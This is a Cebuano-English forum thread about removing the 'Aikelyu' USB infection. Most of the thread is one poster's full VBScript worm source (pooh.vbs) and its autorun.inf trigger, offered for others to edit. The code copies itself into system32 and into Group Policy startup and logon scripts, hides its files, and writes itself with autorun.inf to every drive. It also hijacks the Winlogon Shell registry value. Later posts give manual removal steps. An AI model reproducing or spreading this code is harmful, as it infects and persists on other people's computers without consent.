aikelyu virus... unsaon pag tang tang?

[tsunade]

---

ahahaha!!! its not a virus mga bro.. its just a vbs script nga mo usab sa imong autorun.inf which will execute the file pooh.vbs.. i can give the script and edit it as you want with youre likings.. maybe edit it with patyon ta mo tanan.. ahahaha..
here it is the inf.:

just edit any autorun.inf eg. USB flash drives or sa imong kaogalingong harddisk.
pero kani akong gihatag ninyo kay ang script lng ni ha walay labot ang worm na mo automatic edit sa inyong *.inf..

Code:

[autorun]
shellexecute=wscript.exe pooh.vbs

next is the VBS:

Code:

'Ngaran Ko Aikelyu! Bulos Waray Waray!!!
on error resume next
dim mysource
dim path
dim fdrive
dim fs 
dim pf 
dim infdrive
dim bf
dim rg
dim nt
dim sd
dim check
dim msgnp
dim inigpfolder_p
dim inigpfolder_t
dim text,size
infdrive = "[autorun]"&vbcrlf&"shellexecute=wscript.exe pooh.vbs"
msgnp = "<html>"&vbcrlf&"<head></head>"&vbcrlf&"<title>Aikelyu</title>"&vbcrlf&"<body bgcolor=black>"&vbcrlf&"<font color=red size=+5>"&vbcrlf&"<center>"&vbcrlf&"<b>"&vbcrlf&"<aikelyu>'Jayker' PogitosGwaposAmigosGarantisadosGalantis Kaayos!!</aikelyu>"&vbcrlf&"</b>"&vbcrlf&"</center>"&vbcrlf&"</font>"&vbcrlf&"</body>"&vbcrlf&"</html>"
inigpfolder_p = ""&vbcrlf&"[Startup]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="&vbcrlf&"[Shutdown]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="
inigpfolder_t = ""&vbcrlf&"[Logon]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="&vbcrlf&"[Logoff]"&vbcrlf&"0CmdLine=pooh.vbs"&vbcrlf&"0Parameters="
set fs = createobject("Scripting.FileSystemObject")
set pf = fs.getfile(Wscript.ScriptFullname)
set text=pf.openastextstream(1,-2)

size = pf.size
check = pf.drive.drivetype
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set path = fs.getspecialfolder(0)
set bf = fs.getfile(path &"\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\kernel.dll.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\kernel.dll.vbs")
bf.attributes = 39
bf.close

'Startup
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Startup\pooh.vbs")
bf.attributes = 39
bf.close

'Shutdown
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\Shutdown\pooh.vbs")
bf.attributes = 39
bf.close

'Logon
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logon\pooh.vbs")
bf.attributes = 39
bf.close

'Logoff
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\Logoff\pooh.vbs")
bf.attributes = 39
bf.close

set bf=fs.getfile(path &"\system32\aikelyu.html")
bf.attributes = 32
set bf=fs.createtextfile(path &"\system32\aikelyu.html",2,true)
bf.write msgnp
set bf=fs.getfile(path &"\system32\aikelyu.html")
bf.attributes = 39
bf.close

set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini")
bf.attributes=32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini",2,true)
bf.write inigpfolder_p
set bf=fs.getfile(path &"\system32\GroupPolicy\Machine\Scripts\scripts.ini")
bf.attributes=39
bf.close

set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini")
bf.attributes=32
set bf=fs.createtextfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini",2,true)
bf.write inigpfolder_t
set bf=fs.getfile(path &"\system32\GroupPolicy\User\Scripts\scripts.ini")
bf.attributes=39
bf.close

set bf=fs.getfile(path &"\Debug\pooh.vbs")
bf.attributes=32
set bf=fs.createtextfile(path &"\Debug\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(path &"\Debug\pooh.vbs")
bf.attributes=39
bf.close

for each fdrive in fs.drives
If (fdrive.drivetype = 1 or fdrive.drivetype = 2) and fdrive.path <> "A:" then
set bf=fs.getfile(fdrive.path &"\pooh.vbs")
bf.attributes = 32
set bf=fs.createtextfile(fdrive.path &"\pooh.vbs",2,true)
bf.write mysource
set bf=fs.getfile(fdrive.path &"\pooh.vbs")
bf.attributes = 39
bf.close

set bf =fs.getfile(fdrive.path &"\autorun.inf")
bf.attributes=32
set bf=fs.createtextfile(fdrive.path &"\autorun.inf",2,true)
bf.write infdrive
set bf =fs.getfile(fdrive.path &"\autorun.inf")
bf.attributes=39
bf.close

end if
next

set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Aikelyu",path&"\system32\aikelyu.html"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","Explorer.exe "&path&"\system32\kernel.dll.vbs"
if check <> 1 then
Wscript.sleep 20000
end if
loop while check<>1

set sd = createobject("Wscript.shell")
sd.run path&"\system32\aikelyu.html /e,/select, "&Wscript.ScriptFullname

save it as pooh.vbs....

pero kinahanglan naka deepfreeze moha....

[D40]

ok kaayo ni nga solution... mao ni gibuhat nako... sulbad na ni nga issue last week pa... salamat sa tanan ni tabang.

Natangtang na ang aikelyu sa usb pero di na mu open ang usb automatically, nangita ug pooh.vbs. Maopen kung right click nimo ang mouse to open the file. Unsaon man ni?

[tsunade]

Natangtang na ang aikelyu sa usb pero di na mu open ang usb automatically, nangita ug pooh.vbs. Maopen kung right click nimo ang mouse to open the file. Unsaon man ni?

ill give you the reg key for that.. dont worry... ill help you out tomorow...

regedit rana!! see yah 2morow.

[circles122345]

Natangtang na ang aikelyu sa usb pero di na mu open ang usb automatically, nangita ug pooh.vbs. Maopen kung right click nimo ang mouse to open the file. Unsaon man ni?

bro avg anti spyware ma repair na nya..kay mao na naka ayo sa akong usb og hardisk

[net_hack]

may pag e format na lang na imong pc! 100% tang2 jud na....
****net_hack*******

[tsunade]

NOTE: Dili na siya virus... maybe its infected pero dili naa siya virus ha.. its just a VBscript Prank.
search google for computer pranks.
Solution:

1.) ctrl+alt+delete
2.) go to process tab
3.) right click wscript.exe and tick end process tree
4.) right click explorer.exe and tick end process tree
5.) after that.....dont close task manager yet.
6.) click file drag-drop menu
7.) click New Task(Run...)
8.) Type explorer.exe on the pop-up dialog box & hit enter.
9.) Go to My Computer click Tools ---> Folder Options --->View Tab --->Uncheck Hide protected hidden files and tick show hidden files.
10.) Go to My Computer right a drive & tick open eg. Drive c:
11.) find a file named pooh.vbs and autorun.inf and delete it.... (repeat step 10 to 11 for more hardrive) eg. Drive D: E: etc.
12.) After successfully deleting all of that files.. close all windows.
13.) Then click start menu ---> run and type regedit
14.)Tick Hkey_loca_lmachine ---> software ---> Microsoft ---> Windows NT ---> Current Version ---> Winlogon
15.) find a key named shell = explorer.exe is the correct value of shell.
16.) if the value is not explorer.exe then right click ---> modify ---> and erase the other value leaving only explorer.exe..
after all of that hardwork close all windows and restart youre PC.

[D40]

tsunade, pagrestart sa pc, when you go to my computer then double click any of your hard disc (c,d,etc), mu ingon siya "cannot find c: pooh.vbs". Imo pa iright click ang mouse, then manually open the hard drive. How to we remove the above statement "cannot find c: pooh.vbs"?

[tsunade]

nahuman na ninimog ug himo nga step...

13.) Then click start menu ---> run and type regedit
14.)Tick Hkey_loca_lmachine ---> software ---> Microsoft ---> Windows NT ---> Current Version ---> Winlogon
15.) find a key named shell = explorer.exe is the correct value of shell.
16.) if the value is not explorer.exe then right click ---> modify ---> and erase the other value leaving only explorer.exe..

---------------------
and

1.) Goto start ---> RUN ---> system32
2.) Be sure you have uncheck the hide protected operating system files.
3.) Find and delete kernell.dll.vbs.. and repeate these steps.

Code:

13.) Then click start menu ---> run and type regedit
14.)Tick Hkey_loca_lmachine ---> software ---> Microsoft ---> Windows NT ---> Current Version ---> Winlogon
15.) find a key named shell = explorer.exe is the correct value of shell.
16.) if the value is not explorer.exe then right click ---> modify ---> and erase the other value leaving only explorer.exe..

restart..

note: ayaw sa gyud ug double click sa bisag unsa nga driver.... kay balik ang script sa registry. unya ra inig human ug restart.

[D40]

tsunade, gave you +1 karma. Thanks for your help!

[tsunade]

any mods out there.. i think this case is solve so.. close this one for D40